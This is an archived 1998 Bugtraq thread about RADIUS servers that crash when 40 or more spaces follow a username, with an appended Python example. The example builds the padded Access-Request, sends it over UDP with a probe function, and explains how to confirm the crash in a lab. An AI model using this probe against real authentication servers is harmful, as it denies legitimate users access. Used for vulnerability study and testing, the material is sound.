Radius spaces-in-username DOS attack.

Summary
Description: A number of Radius implementations will crash if enough spaces (40 or more, per the follow-up in the thread) are appended to a username.
Author: "Phillip R. Jaenke" <prj@NLS.NET>
Compromise: Stupid DOS attack
Vulnerable Systems: Several UNIX and NT radius implementations including Livingston 1.16 to 2.01 and RadiusNT v2.x; merit radius 2.4.23C was reported both vulnerable and not vulnerable (see Aleph One's summary at the end of the thread)
Date: 20 February 1998
Details


Date: Fri, 20 Feb 1998 21:02:53 -0500
From: "Phillip R. Jaenke" <prj@NLS.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Serious bug in "radius" dialup authentication software

At work, we've discovered a *SERIOUS* bug in the "radius" dialup
authentication software.

Affected Platforms:
WindowsNT (RadiusNT)
Linux
Solaris (x86)
BSDi
NetBSD
OpenBSD
FreeBSD

Problem:
If a user appends a certain number of spaces after their username, Radius
will crash, keeping users from logging in. We have been unable to
determine the number of spaces, but it is above 5, and below the 'magic
128' as we call it. I'd estimate it at around 32 spaces.

Effects:
100% of the time, Radius will crash. All platforms are affected. Multiple
servers do not negate these effects, as most terminal servers, when the
primary radius authentication server is not there, will switch over to the
next one, which will get the same username, and crash, locking all
customers out. This appears to affect ALL platforms, be it WindowsNT or a
form of unix. It appears to be a bug in radius itself.

A coworker has contacted the radius mailing lists. As soon as a fix is
known, I will post it here.

--Phillip R. Jaenke (prj@raex.com | prj@nls.net)
Primary Developer, The Improvement Linux Project
Core Team Member, The Cyberian RC5 Effort - http://www.cyberian.org/
AKA Kaeyerai (Rediscovery) of MasterTechnoMonster
Ketyra Designs, Inc. - Imagine Transmeta sans Linus. That's us. :)

Date: Sat, 21 Feb 1998 13:12:37 +0100
From: "Phillip R. Jaenke" <prj@NS2.NLS.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Serious bug in "radius" dialup authentication software

>You're not telling us which radius server. Livingston 1.16 or 2.01?
>Merit? Cistron? etc (As a matter of fact I am sure Cistron is safe).

Since this is the 22nd email I've received on this, I decided to CC: to
bugtraq so everyone will PLEASE stop asking me this.

So far, tested servers are:
Livingston 1.16 to 2.01
RadiusNT v2.x
Merit

So far, the only one NOT vulnerable is Merit. Cistron is untested, so I've
got no idea whether or not it is. Best way to test is to telnet to a
terminal server, and login with a valid username, with 40 or more spaces
after it.

As to Cistron being safe; safe is really relative here. If somebody nasty
has your dialup numbers, then you might have to restart radius a lot.
Otherwise, there's really no security risk that I've found.

-prj

-Ed Kuchar  (InterNIC Handle: EK113)  [ekuchar@NLS.NET]
NetLink Services, Inc. 216.468.5100(Cleveland) - 330.940.2700(Akron)
sales@nls.net - http://www.nls.net - http://www.getinfo.net
Serving: Cleveland, Akron, Medina, & Geauga County

Date: Sat, 21 Feb 1998 13:01:09 +0100
From: "Phillip R. Jaenke" <prj@NS2.NLS.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: Quick update on Radius bug

Just counted the spaces.

The magic number here was 40.

-prj

-Ed Kuchar  (InterNIC Handle: EK113)  [ekuchar@NLS.NET]
NetLink Services, Inc. 216.468.5100(Cleveland) - 330.940.2700(Akron)
sales@nls.net - http://www.nls.net - http://www.getinfo.net
Serving: Cleveland, Akron, Medina, & Geauga County

Date: Sun, 22 Feb 1998 13:07:55 -0600
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: RADIUS (Summary)

This is a summary of reports about the radius vulnerability that
Phillip R. Jaenke reported. Giving the large number of people that
have reported that they are not vulnerable I must wonder what is
unique in Phillip's environment that is causing this. Only one person
reported Merit RADIUS being vulnerable and that has not been
confirmed yet.

So far reported not vulnerable:

Merit 2.4.23C,
Livingston RADIUS  2.0.1 97/5/22
Livingstons RADIUS 2.01
Perl RADIUS module
MacRADIUS
ESVA Radius

Reported vulnerable:

Livingston 1.16 to 2.01 (Phillip R. Jaenke)
RadiusNT v2.x (Phillip R. Jaenke)
merit radius 2.4.23C (jbeley@puma.sirinet.net)

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01
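
As an added example that is not part of the Bugtraq thread and is not code from any of the servers it names, the Python below builds the RADIUS Access-Request (RFC 2865) that a terminal server would forward for the reproduction step given in the thread (a valid username followed by 40 or more spaces), hides the PAP password the way RFC 2865 section 5.2 requires, and decodes the packet back with the length checks a server has to make. It lets you repeat the test from a workstation against a lab server instead of through a terminal server, and it also covers the case the posts only hint at: what happens when the padded username grows past the protocol's own attribute limit. The shared secret, NAS address, the "alice"/"hunter2" account and the port are constructed placeholders, and send_probe is a lab helper of mine, not anything the posters used.

```python
"""RADIUS Access-Request builder/decoder (RFC 2865) for reproducing the
"username followed by 40 spaces" condition against a lab server.
Added example, not code from the Bugtraq posts. Secret, NAS address,
credentials and port are constructed placeholders."""
import hashlib
import os
import socket
import struct

ACCESS_REQUEST = 1
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2
ATTR_NAS_IP_ADDRESS = 4


def hide_password(password, secret, authenticator):
    """PAP hiding, RFC 2865 section 5.2: zero-pad to a multiple of 16 octets,
    XOR each block with MD5(secret + previous block), seeded with the
    Request Authenticator. User-Password is capped at 128 octets."""
    if len(password) > 128:
        raise ValueError("User-Password is limited to 128 octets")
    padded = password + b"\x00" * (-len(password) % 16)
    hidden, prev = b"", authenticator
    for i in range(0, len(padded), 16):
        key = hashlib.md5(secret + prev).digest()
        block = bytes(p ^ k for p, k in zip(padded[i:i + 16], key))
        hidden, prev = hidden + block, block
    return hidden


def unhide_password(hidden, secret, authenticator):
    """Inverse of hide_password; strips the zero padding."""
    plain, prev = b"", authenticator
    for i in range(0, len(hidden), 16):
        key = hashlib.md5(secret + prev).digest()
        plain += bytes(h ^ k for h, k in zip(hidden[i:i + 16], key))
        prev = hidden[i:i + 16]
    return plain.rstrip(b"\x00")


def attribute(atype, value):
    """Type-Length-Value; Length counts its own 2-octet header, so a value is
    at most 253 octets. (The post's "magic 128" is the poster's own figure;
    the only 128-octet limit in RFC 2865 is User-Password's.)"""
    if len(value) > 253:
        raise ValueError("RADIUS attribute value exceeds 253 octets")
    return struct.pack("!BB", atype, len(value) + 2) + value


def build_access_request(username, password, secret, nas_ip, pad_spaces,
                         ident=0, authenticator=None):
    """The packet a NAS emits for a login typed with pad_spaces trailing
    spaces after the username, as in the thread's reproduction step."""
    if authenticator is None:
        authenticator = os.urandom(16)
    user_name = username.encode() + b" " * pad_spaces
    attrs = (attribute(ATTR_USER_NAME, user_name)
             + attribute(ATTR_USER_PASSWORD,
                         hide_password(password.encode(), secret, authenticator))
             + attribute(ATTR_NAS_IP_ADDRESS, socket.inet_aton(nas_ip)))
    header = struct.pack("!BBH", ACCESS_REQUEST, ident, 20 + len(attrs))
    return header + authenticator + attrs


def parse_packet(packet):
    """Decode header and attributes, validating every length before using it
    (the check a server must make before indexing into its buffer)."""
    if len(packet) < 20:
        raise ValueError("packet shorter than RADIUS header")
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if length != len(packet):
        raise ValueError("Length field does not match packet size")
    attrs, pos = [], 20
    while pos < length:
        if pos + 2 > length:
            raise ValueError("truncated attribute header")
        atype, alen = packet[pos], packet[pos + 1]
        if alen < 2 or pos + alen > length:
            raise ValueError("attribute length out of range")
        attrs.append((atype, packet[pos + 2:pos + alen]))
        pos += alen
    return code, ident, packet[4:20], attrs


def trailing_spaces_in_user_name(attrs):
    """Trailing spaces in User-Name, or None if the attribute is absent."""
    for atype, value in attrs:
        if atype == ATTR_USER_NAME:
            return len(value) - len(value.rstrip(b" "))
    return None


def send_probe(packet, host, port=1812, timeout=3.0):
    """Send over UDP; None on timeout. Older servers listen on 1645, and a
    server that has crashed simply stops answering."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(packet, (host, port))
        try:
            return s.recv(4096)
        except socket.timeout:
            return None
```

To repeat the thread's test in a lab, build a request with pad_spaces=40 and the server's real shared secret, send it with send_probe, then send a normal request: a server that answered the first and goes silent on the second has done what the posts describe. The parser's checks are the other half of the picture; a server that trusts the Length field or an attribute length before bounding it is the kind of code this sort of input finds, though the thread never identifies the actual fault in any of the servers listed.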

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap.